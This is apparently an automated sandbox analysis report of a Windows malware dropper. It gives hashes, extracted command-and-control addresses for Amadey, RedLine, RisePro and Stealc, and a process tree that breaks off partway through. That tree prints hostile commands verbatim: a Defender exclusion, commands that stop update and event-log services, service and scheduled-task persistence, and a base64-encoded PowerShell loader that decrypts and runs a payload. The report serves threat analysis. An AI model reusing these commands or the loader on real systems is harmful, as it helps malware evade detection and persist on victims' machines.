Analysis

  • max time kernel
    108s
  • max time network
    146s
  • platform
    windows10-2004_x64
  • resource
    win10v2004-20240426-en
  • resource tags

    arch:x64arch:x86image:win10v2004-20240426-enlocale:en-usos:windows10-2004-x64system
  • submitted
    14-05-2024 23:27

General

  • Target

    0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe

  • Size

    1.7MB

  • MD5

    7436868f4ea3111d204d5f5eea08eec5

  • SHA1

    1ffba75eec05fed9564966eeca1cfcb6c5751774

  • SHA256

    0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447

  • SHA512

    04397d86398d7582c07172b38193a97cf4454a660c4af999b9347e23561e2648c36eb3ac98ce948f1239159709cfec991780ab45e88fe48d8e3dc7e36a1ee939

  • SSDEEP

    49152:UsVMbU+osuveQdNoTA4K8eFq+ljjW8uh5qcVBp:TVMbDosuvqTA9Fqr8a5qmp

Malware Config

Extracted

Family

amadey

Version

4.20

C2

http://5.42.96.141

http://5.42.96.7

Attributes
  • install_dir

    908f070dff

  • install_file

    explorku.exe

  • strings_key

    b25a9385246248a95c600f9a061438e1

  • url_paths

    /go34ko8/index.php

rc4.plain
rc4.plain

Extracted

Family

risepro

C2

147.45.47.126:58709

Extracted

Family

redline

Botnet

@CLOUDYTTEAM

C2

185.172.128.33:8970

Extracted

Family

redline

Botnet

1

C2

185.215.113.67:26260

Extracted

Family

stealc

C2

http://49.13.229.86

Attributes
  • url_path

    /c73eed764cc59dcb.php

Signatures

  • Amadey

    Amadey bot is a simple trojan bot primarily used for collecting reconnaissance information.

  • Detect ZGRat V1 11 IoCs
  • Modifies firewall policy service 2 TTPs 1 IoCs
  • PrivateLoader

    PrivateLoader is a downloader sold as a pay-per-install malware distribution service.

  • RedLine

    RedLine Stealer is a malware family written in C#, first appearing in early 2020.

  • RedLine payload 6 IoCs
  • RisePro

    RisePro stealer is an infostealer distributed by PrivateLoader.

  • Stealc

    Stealc is an infostealer written in C++.

  • XMRig Miner payload 2 IoCs
  • ZGRat

    ZGRat is remote access trojan written in C#.

  • xmrig

    XMRig is a high performance, open source, cross platform CPU/GPU miner.

  • Identifies VirtualBox via ACPI registry values (likely anti-VM) 2 TTPs 9 IoCs
  • Command and Scripting Interpreter: PowerShell 1 TTPs 9 IoCs

    Using powershell.exe command.

  • Creates new service(s) 2 TTPs
  • Downloads MZ/PE file
  • Stops running service(s) 4 TTPs
  • Checks BIOS information in registry 2 TTPs 18 IoCs

    BIOS information is often read in order to detect sandboxing environments.

  • Checks computer location settings 2 TTPs 13 IoCs

    Looks up country code configured in the registry, likely geofence.

  • Executes dropped EXE 64 IoCs
  • Identifies Wine through registry keys 2 TTPs 3 IoCs

    Wine is a compatibility layer capable of running Windows applications, which can be used as sandboxing environment.

  • Loads dropped DLL 5 IoCs
  • Reads user/profile data of web browsers 2 TTPs

    Infostealers often target stored browser data, which can include saved credentials etc.

  • Themida packer 47 IoCs

    Detects Themida, an advanced Windows software protection system.

  • Accesses cryptocurrency files/wallets, possible credential harvesting 2 TTPs
  • Adds Run key to start application 2 TTPs 1 IoCs
  • Checks installed software on the system 1 TTPs

    Looks up Uninstall key entries in the registry to enumerate software on the system.

  • Checks whether UAC is enabled 1 TTPs 6 IoCs
  • Legitimate hosting services abused for malware hosting/C2 1 TTPs 1 IoCs
  • Looks up external IP address via web service 4 IoCs

    Uses a legitimate IP lookup service to find the infected system's external IP.

  • Writes to the Master Boot Record (MBR) 1 TTPs 2 IoCs

    Bootkits write to the MBR to gain persistence at a level below the operating system.

  • Drops file in System32 directory 6 IoCs
  • Suspicious use of NtSetInformationThreadHideFromDebugger 5 IoCs
  • Suspicious use of SetThreadContext 7 IoCs
  • Drops file in Program Files directory 17 IoCs
  • Drops file in Windows directory 2 IoCs
  • Launches sc.exe 14 IoCs

    Sc.exe is a Windows utlilty to control services on the system.

  • Enumerates physical storage devices 1 TTPs

    Attempts to interact with connected storage/optical drive(s).

  • Program crash 20 IoCs
  • Checks SCSI registry key(s) 3 TTPs 3 IoCs

    SCSI information is often read in order to detect sandboxing environments.

  • Checks processor information in registry 2 TTPs 2 IoCs

    Processor information is often read in order to detect sandboxing environments.

  • Creates scheduled task(s) 1 TTPs 1 IoCs

    Schtasks is often used by malware for persistence or to perform post-infection execution.

  • Kills process with taskkill 2 IoCs
  • Modifies data under HKEY_USERS 64 IoCs
  • Modifies system certificate store 2 TTPs 2 IoCs
  • Suspicious behavior: EnumeratesProcesses 64 IoCs
  • Suspicious use of AdjustPrivilegeToken 45 IoCs
  • Suspicious use of FindShellTrayWindow 3 IoCs
  • Suspicious use of SendNotifyMessage 1 IoCs
  • Suspicious use of SetWindowsHookEx 2 IoCs
  • Suspicious use of WriteProcessMemory 64 IoCs

Processes

  • C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe
    "C:\Users\Admin\AppData\Local\Temp\0f019f41c433e4dc447137d9397743267c57ce25f78a1fc8e2d237dceba02447.exe"
    1⤵
    • Identifies VirtualBox via ACPI registry values (likely anti-VM)
    • Checks BIOS information in registry
    • Checks computer location settings
    • Checks whether UAC is enabled
    • Drops file in Windows directory
    • Suspicious use of WriteProcessMemory
    PID:4424
    • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
      "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
      2⤵
      • Identifies VirtualBox via ACPI registry values (likely anti-VM)
      • Checks BIOS information in registry
      • Checks computer location settings
      • Executes dropped EXE
      • Adds Run key to start application
      • Checks whether UAC is enabled
      • Suspicious use of WriteProcessMemory
      PID:552
      • C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe
        "C:\Users\Admin\AppData\Local\Temp\908f070dff\explorku.exe"
        3⤵
          PID:2472
        • C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe
          "C:\Users\Admin\AppData\Local\Temp\1000005001\amers.exe"
          3⤵
          • Identifies VirtualBox via ACPI registry values (likely anti-VM)
          • Checks BIOS information in registry
          • Checks computer location settings
          • Executes dropped EXE
          • Identifies Wine through registry keys
          • Suspicious use of NtSetInformationThreadHideFromDebugger
          • Drops file in Windows directory
          • Suspicious behavior: EnumeratesProcesses
          • Suspicious use of WriteProcessMemory
          PID:1912
          • C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe
            "C:\Users\Admin\AppData\Local\Temp\7af68cdb52\axplons.exe"
            4⤵
            • Identifies VirtualBox via ACPI registry values (likely anti-VM)
            • Checks BIOS information in registry
            • Checks computer location settings
            • Executes dropped EXE
            • Identifies Wine through registry keys
            • Suspicious use of NtSetInformationThreadHideFromDebugger
            • Suspicious behavior: EnumeratesProcesses
            • Suspicious use of WriteProcessMemory
            PID:4400
            • C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe
              "C:\Users\Admin\AppData\Local\Temp\1000003001\alex.exe"
              5⤵
              • Executes dropped EXE
              • Suspicious use of SetThreadContext
              • Suspicious use of WriteProcessMemory
              PID:3232
              • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                6⤵
                • Checks computer location settings
                • Suspicious use of AdjustPrivilegeToken
                • Suspicious use of WriteProcessMemory
                PID:1508
                • C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\keks.exe"
                  7⤵
                  • Executes dropped EXE
                  • Modifies system certificate store
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:2908
                • C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe
                  "C:\Users\Admin\AppData\Roaming\configurationValue\trf.exe"
                  7⤵
                  • Executes dropped EXE
                  • Suspicious behavior: EnumeratesProcesses
                  • Suspicious use of AdjustPrivilegeToken
                  PID:4260
                • C:\Windows\SysWOW64\cmd.exe
                  "C:\Windows\System32\cmd.exe" /C choice /C Y /N /D Y /T 3 & Del "RegAsm.exe"
                  7⤵
                    PID:2296
                    • C:\Windows\SysWOW64\choice.exe
                      choice /C Y /N /D Y /T 3
                      8⤵
                        PID:1832
                  • C:\Windows\SysWOW64\WerFault.exe
                    C:\Windows\SysWOW64\WerFault.exe -u -p 3232 -s 332
                    6⤵
                    • Program crash
                    PID:1396
                • C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe
                  "C:\Users\Admin\AppData\Local\Temp\1000004001\gold.exe"
                  5⤵
                  • Executes dropped EXE
                  • Suspicious use of SetThreadContext
                  • Suspicious use of WriteProcessMemory
                  PID:3792
                  • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                    "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                    6⤵
                      PID:3824
                  • C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000005001\redline1.exe"
                    5⤵
                    • Executes dropped EXE
                    • Suspicious behavior: EnumeratesProcesses
                    • Suspicious use of AdjustPrivilegeToken
                    PID:3464
                  • C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe
                    "C:\Users\Admin\AppData\Local\Temp\1000006001\install.exe"
                    5⤵
                    • Checks computer location settings
                    • Executes dropped EXE
                    • Drops file in Program Files directory
                    • Suspicious use of WriteProcessMemory
                    PID:4376
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installg.bat" "
                      6⤵
                      • Suspicious use of WriteProcessMemory
                      PID:4056
                      • C:\Windows\SysWOW64\sc.exe
                        Sc stop GameServerClient
                        7⤵
                        • Launches sc.exe
                        PID:640
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameServerClient confirm
                        7⤵
                        • Executes dropped EXE
                        PID:1356
                      • C:\Windows\SysWOW64\sc.exe
                        Sc delete GameSyncLink
                        7⤵
                        • Launches sc.exe
                        PID:1520
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService remove GameSyncLink confirm
                        7⤵
                        • Executes dropped EXE
                        PID:1944
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService install GameSyncLink "C:\Program Files (x86)\GameSyncLink\GameSyncLink.exe"
                        7⤵
                        • Executes dropped EXE
                        PID:3836
                      • C:\Program Files (x86)\GameSyncLink\GameService.exe
                        GameService start GameSyncLink
                        7⤵
                        • Executes dropped EXE
                        PID:1320
                    • C:\Windows\SysWOW64\cmd.exe
                      C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installc.bat" "
                      6⤵
                        PID:1288
                        • C:\Windows\System32\Conhost.exe
                          \??\C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
                          7⤵
                            PID:640
                          • C:\Windows\SysWOW64\sc.exe
                            Sc stop GameServerClientC
                            7⤵
                            • Launches sc.exe
                            PID:4472
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove GameServerClientC confirm
                            7⤵
                            • Executes dropped EXE
                            PID:3360
                          • C:\Windows\SysWOW64\sc.exe
                            Sc delete PiercingNetLink
                            7⤵
                            • Launches sc.exe
                            PID:2528
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService remove PiercingNetLink confirm
                            7⤵
                            • Executes dropped EXE
                            PID:376
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService install PiercingNetLink "C:\Program Files (x86)\GameSyncLink\PiercingNetLink.exe"
                            7⤵
                            • Executes dropped EXE
                            PID:3048
                          • C:\Program Files (x86)\GameSyncLink\GameService.exe
                            GameService start PiercingNetLink
                            7⤵
                            • Executes dropped EXE
                            PID:2312
                        • C:\Windows\SysWOW64\cmd.exe
                          C:\Windows\system32\cmd.exe /c ""C:\Program Files (x86)\GameSyncLink\installm.bat" "
                          6⤵
                            PID:6008
                            • C:\Windows\SysWOW64\sc.exe
                              Sc delete GameSyncLinks
                              7⤵
                              • Launches sc.exe
                              PID:6116
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService remove GameSyncLinks confirm
                              7⤵
                              • Executes dropped EXE
                              PID:2628
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService install GameSyncLinks "C:\Program Files (x86)\GameSyncLink\GameSyncLinks.exe"
                              7⤵
                              • Executes dropped EXE
                              PID:6948
                            • C:\Program Files (x86)\GameSyncLink\GameService.exe
                              GameService start GameSyncLinks
                              7⤵
                              • Executes dropped EXE
                              PID:6976
                          • C:\Windows\SysWOW64\cmd.exe
                            C:\Windows\system32\cmd.exe /c ""C:\Users\Admin\AppData\Local\Temp\7ZSfx000.cmd" "
                            6⤵
                              PID:6528
                          • C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000007001\swizzhis.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:400
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                              • Checks processor information in registry
                              PID:3816
                          • C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe
                            "C:\Users\Admin\AppData\Local\Temp\1000010001\lumma1.exe"
                            5⤵
                            • Executes dropped EXE
                            • Suspicious use of SetThreadContext
                            PID:376
                            • C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe
                              "C:\Windows\Microsoft.NET\Framework\v4.0.30319\RegAsm.exe"
                              6⤵
                                PID:4856
                            • C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe
                              "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe"
                              5⤵
                              • Checks computer location settings
                              • Executes dropped EXE
                              PID:2204
                              • C:\Windows\SysWOW64\schtasks.exe
                                "C:\Windows\System32\schtasks.exe" /Create /SC MINUTE /MO 1 /TN NewB.exe /TR "C:\Users\Admin\AppData\Local\Temp\1000015001\NewB.exe" /F
                                6⤵
                                • Creates scheduled task(s)
                                PID:5172
                              • C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe
                                "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe"
                                6⤵
                                • Checks computer location settings
                                • Executes dropped EXE
                                PID:5368
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 460
                                  7⤵
                                  • Program crash
                                  PID:1636
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 520
                                  7⤵
                                  • Program crash
                                  PID:5164
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 560
                                  7⤵
                                  • Program crash
                                  PID:5916
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 780
                                  7⤵
                                  • Program crash
                                  PID:6560
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 632
                                  7⤵
                                  • Program crash
                                  PID:5796
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 588
                                  7⤵
                                  • Program crash
                                  PID:4388
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 968
                                  7⤵
                                  • Program crash
                                  PID:6828
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1012
                                  7⤵
                                  • Program crash
                                  PID:1392
                                • C:\Windows\SysWOW64\WerFault.exe
                                  C:\Windows\SysWOW64\WerFault.exe -u -p 5368 -s 1340
                                  7⤵
                                  • Program crash
                                  PID:5400
                                • C:\Windows\SysWOW64\cmd.exe
                                  "C:\Windows\System32\cmd.exe" /c taskkill /im "dl.exe" /f & erase "C:\Users\Admin\AppData\Local\Temp\1000258001\dl.exe" & exit
                                  7⤵
                                    PID:2176
                                    • C:\Windows\SysWOW64\taskkill.exe
                                      taskkill /im "dl.exe" /f
                                      8⤵
                                      • Kills process with taskkill
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:1004
                                • C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000259001\toolspub1.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Checks SCSI registry key(s)
                                  PID:5868
                                  • C:\Windows\SysWOW64\WerFault.exe
                                    C:\Windows\SysWOW64\WerFault.exe -u -p 5868 -s 460
                                    7⤵
                                    • Program crash
                                    PID:5452
                                • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Suspicious behavior: EnumeratesProcesses
                                  • Suspicious use of AdjustPrivilegeToken
                                  PID:1248
                                  • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                    powershell -nologo -noprofile
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6768
                                  • C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000260001\4767d2e713f2021e8fe856e3ea638b58.exe"
                                    7⤵
                                    • Executes dropped EXE
                                    • Modifies data under HKEY_USERS
                                    PID:3500
                                    • C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
                                      powershell -nologo -noprofile
                                      8⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Modifies data under HKEY_USERS
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:6628
                                • C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe
                                  "C:\Users\Admin\AppData\Local\Temp\1000261001\FirstZ.exe"
                                  6⤵
                                  • Executes dropped EXE
                                  • Drops file in System32 directory
                                  • Suspicious behavior: EnumeratesProcesses
                                  PID:4008
                                  • C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe
                                    C:\Windows\system32\WindowsPowerShell\v1.0\powershell.exe Add-MpPreference -ExclusionPath @($env:UserProfile, $env:ProgramData) -ExclusionExtension '.exe' -Force
                                    7⤵
                                    • Command and Scripting Interpreter: PowerShell
                                    • Suspicious behavior: EnumeratesProcesses
                                    • Suspicious use of AdjustPrivilegeToken
                                    PID:6740
                                  • C:\Windows\system32\cmd.exe
                                    C:\Windows\system32\cmd.exe /c wusa /uninstall /kb:890830 /quiet /norestart
                                    7⤵
                                      PID:5360
                                      • C:\Windows\system32\wusa.exe
                                        wusa /uninstall /kb:890830 /quiet /norestart
                                        8⤵
                                          PID:5652
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop UsoSvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:5692
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop WaaSMedicSvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:6216
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop wuauserv
                                        7⤵
                                        • Launches sc.exe
                                        PID:2024
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop bits
                                        7⤵
                                        • Launches sc.exe
                                        PID:5432
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop dosvc
                                        7⤵
                                        • Launches sc.exe
                                        PID:1972
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-ac 0
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:6036
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -hibernate-timeout-dc 0
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:6076
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-ac 0
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:6096
                                      • C:\Windows\system32\powercfg.exe
                                        C:\Windows\system32\powercfg.exe /x -standby-timeout-dc 0
                                        7⤵
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:6056
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe delete "WSNKISKT"
                                        7⤵
                                        • Launches sc.exe
                                        PID:7052
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe create "WSNKISKT" binpath= "C:\ProgramData\wikombernizc\reakuqnanrkn.exe" start= "auto"
                                        7⤵
                                        • Launches sc.exe
                                        PID:2844
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe stop eventlog
                                        7⤵
                                        • Launches sc.exe
                                        PID:5088
                                      • C:\Windows\system32\sc.exe
                                        C:\Windows\system32\sc.exe start "WSNKISKT"
                                        7⤵
                                        • Launches sc.exe
                                        PID:1224
                                  • C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe
                                    "C:\Users\Admin\AppData\Local\Temp\1000042001\file300un.exe"
                                    5⤵
                                    • Executes dropped EXE
                                    PID:5608
                                    • C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
                                      powershell.exe -EncodedCommand WwBTAHkAcwB0AGUAbQAuAFQAaAByAGUAYQBkAGkAbgBnAC4AVABoAHIAZQBhAGQAXQA6ADoAUwBsAGUAZQBwACgANQAwADAAMAApAAoACgAkAFQAZQBtAHAARABpAHIAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAFAAYQB0AGgAXQA6ADoARwBlAHQAVABlAG0AcABQAGEAdABoACgAKQAKACQAUABhAHQAdABlAHIAbgAgAD0AIAAnAGYAaQBsAGUALQAqAC4AcAB1AHQAaQBrACcACgAkAEwAYQB0AGUAcwB0AEYAaQBsAGUAIAA9ACAARwBlAHQALQBDAGgAaQBsAGQASQB0AGUAbQAgAC0AUABhAHQAaAAgACQAVABlAG0AcABEAGkAcgAgAC0ARgBpAGwAdABlAHIAIAAkAFAAYQB0AHQAZQByAG4AIAB8ACAAUwBvAHIAdAAtAE8AYgBqAGUAYwB0ACAATABhAHMAdABXAHIAaQB0AGUAVABpAG0AZQAgAC0ARABlAHMAYwBlAG4AZABpAG4AZwAgAHwAIABTAGUAbABlAGMAdAAtAE8AYgBqAGUAYwB0ACAALQBGAGkAcgBzAHQAIAAxAAoACgBmAHUAbgBjAHQAaQBvAG4AIADjicZbIAB7AAoAIAAgACAAIABwAGEAcgBhAG0AIAAoAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAKWUGVMsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkABFUz5EsAAoAIAAgACAAIAAgACAAIAAgAFsAYgB5AHQAZQBbAF0AXQAkAHBlbmMKACAAIAAgACAAKQAKAAoAIAAgACAAIAAkAKBSxltoViAAPQAgAFsAUwB5AHMAdABlAG0ALgBTAGUAYwB1AHIAaQB0AHkALgBDAHIAeQBwAHQAbwBnAHIAYQBwAGgAeQAuAEEAZQBzAF0AOgA6AEMAcgBlAGEAdABlACgAKQAKACAAIAAgACAAJACgUsZbaFYuAE0AbwBkAGUAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AQwBpAHAAaABlAHIATQBvAGQAZQBdADoAOgBDAEIAQwAKACAAIAAgACAAJACgUsZbaFYuAFAAYQBkAGQAaQBuAGcAIAA9ACAAWwBTAHkAcwB0AGUAbQAuAFMAZQBjAHUAcgBpAHQAeQAuAEMAcgB5AHAAdABvAGcAcgBhAHAAaAB5AC4AUABhAGQAZABpAG4AZwBNAG8AZABlAF0AOgA6AFAASwBDAFMANwAKAAoAIAAgACAAIAAkAOOJxltoViAAPQAgACQAoFLGW2hWLgBDAHIAZQBhAHQAZQBEAGUAYwByAHkAcAB0AG8AcgAoACQApZQZUywAIAAkABFUz5EpAAoAIAAgACAAIAAkAOOJxltwZW5jIAA9ACAAJADjicZbaFYuAFQAcgBhAG4AcwBmAG8AcgBtAEYAaQBuAGEAbABCAGwAbwBjAGsAKAAkAHBlbmMsACAAMAAsACAAJABwZW5jLgBMAGUAbgBnAHQAaAApAAoACQAKACAAIAAgACAAcgBlAHQAdQByAG4AIAAkAOOJxltwZW5jCgB9AAoACgAkAKWUGVMgAD0AIABbAGIAeQB0AGUAWwBdAF0AQAAoADAAeABFAEMALAAgADAAeAA2AEYALAAgADAAeAAzADYALAAgADAAeAAwAEUALAAgADAAeAAyAEMALAAgADAAeAA0ADYALAAgADAAeAAwADMALAAgADAAeAA4AEMALAAgADAAeABCADUALAAgADAAeABGAEYALAAgADAAeAAxADAALAAgADAAeABBADUALAAgADAAeAAyADUALAAgADAAeAA4AEIALAAgADAAeAAxAEIALAAgADAAeAA3ADkALAAgADAAeABCAEMALAAgADAAeABBADUALAAgADAAeAAzADkALAAgADAAeAA0ADgALAAgADAAeABFADIALAAgADAAeAA2ADIALAAgADAAeAA4ADUALAAgADAAeAAyADgALAAgADAAeAAzADcALAAgADAAeABCAEYALAAgADAAeAA0ADEALAAgADAAeABBAEQALAAgADAAeAAxADgALAAgADAAeAAxADYALAAgADAAeAA5AEMALAAgADAAeAAwAEQAKQAKACQAEVTPkSAAPQAgAFsAYgB5AHQAZQBbAF0AXQBAACgAMAB4ADUARgAsACAAMAB4AEYAQwAsACAAMAB4ADgAQwAsACAAMAB4ADcAQwAsACAAMAB4ADMAOQAsACAAMAB4ADcANQAsACAAMAB4ADAAOQAsACAAMAB4AEYAQwAsACAAMAB4AEIAOQAsACAAMAB4ADcAMQAsACAAMAB4AEYAQwAsACAAMAB4AEUAQgAsACAAMAB4ADQAQQAsACAAMAB4AEUARQAsACAAMAB4AEIARgAsACAAMAB4ADcANgApAAoACgBpAGYAIAAoACQATABhAHQAZQBzAHQARgBpAGwAZQAgAC0AbgBlACAAJABuAHUAbABsACkAIAB7AAoAIAAgACAAIAAkAIdl9k7vjYRfIAA9ACAAJABMAGEAdABlAHMAdABGAGkAbABlAC4ARgB1AGwAbABOAGEAbQBlAAoAIAAgACAAIAAkAKBSxltXW4KCIAA9ACAAWwBTAHkAcwB0AGUAbQAuAEkATwAuAEYAaQBsAGUAXQA6ADoAUgBlAGEAZABBAGwAbABCAHkAdABlAHMAKAAkAIdl9k7vjYRfKQA7AAoAIAAgACAAIAAkAOOJxluFUblbIAA9ACAA44nGWyAALQCllBlTIAAkAKWUGVMgAC0AEVTPkSAAJAARVM+RIAAtAHBlbmMgACQAoFLGW1dbgoIKAAoAIAAgACAAIAAkAAt6j17GliAAPQAgAFsAUwB5AHMAdABlAG0ALgBSAGUAZgBsAGUAYwB0AGkAbwBuAC4AQQBzAHMAZQBtAGIAbAB5AF0AOgA6AEwAbwBhAGQAKABbAGIAeQB0AGUAWwBdAF0AQAAoACQA44nGW4VRuVspACkAOwAKACAAIAAgACAAJABlUeNTuXAgAD0AIAAkAAt6j17Gli4ARQBuAHQAcgB5AFAAbwBpAG4AdAA7AAoAIAAgACAAIAAkAGVR41O5cC4ASQBuAHYAbwBrAGUAKAAkAG4AdQBsAGwALAAgACQAbgB1AGwAbAApADsACgB9AAoA
                                      6⤵
                                      • Command and Scripting Interpreter: PowerShell
                                      • Suspicious use of SetThreadContext
                                      • Suspicious behavior: EnumeratesProcesses
                                      • Suspicious use of AdjustPrivilegeToken
                                      PID:5704
                                      • C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe
                                        "C:\Windows\Microsoft.NET\Framework\v4.0.30319\regasm.exe"
                                        7⤵
                                        • Checks computer location settings
                                        • Suspicious use of AdjustPrivilegeToken
                                        PID:5880
                                        • C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe
                                          "C:\Users\Admin\Pictures\r68KCX9sUSmVjFbWX1AIpKq5.exe"
                                          8⤵
                                          • Checks computer location settings
                                          • Executes dropped EXE
                                          PID:6700
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 448
                                            9⤵
                                            • Program crash
                                            PID:4388
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 512
                                            9⤵
                                            • Program crash
                                            PID:1696
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 748
                                            9⤵
                                            • Program crash
                                            PID:4500
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 792
                                            9⤵
                                            • Program crash
                                            PID:5680
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 820
                                            9⤵
                                            • Program crash
                                            PID:6164
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 840
                                            9⤵
                                            • Program crash
                                            PID:6720
                                          • C:\Windows\SysWOW64\WerFault.exe
                                            C:\Windows\SysWOW64\WerFault.exe -u -p 6700 -s 792
                                            9⤵
                                            • Program crash
                                            PID:6744
                                          • C:\Windows\SysWOW64\WerFault.exe
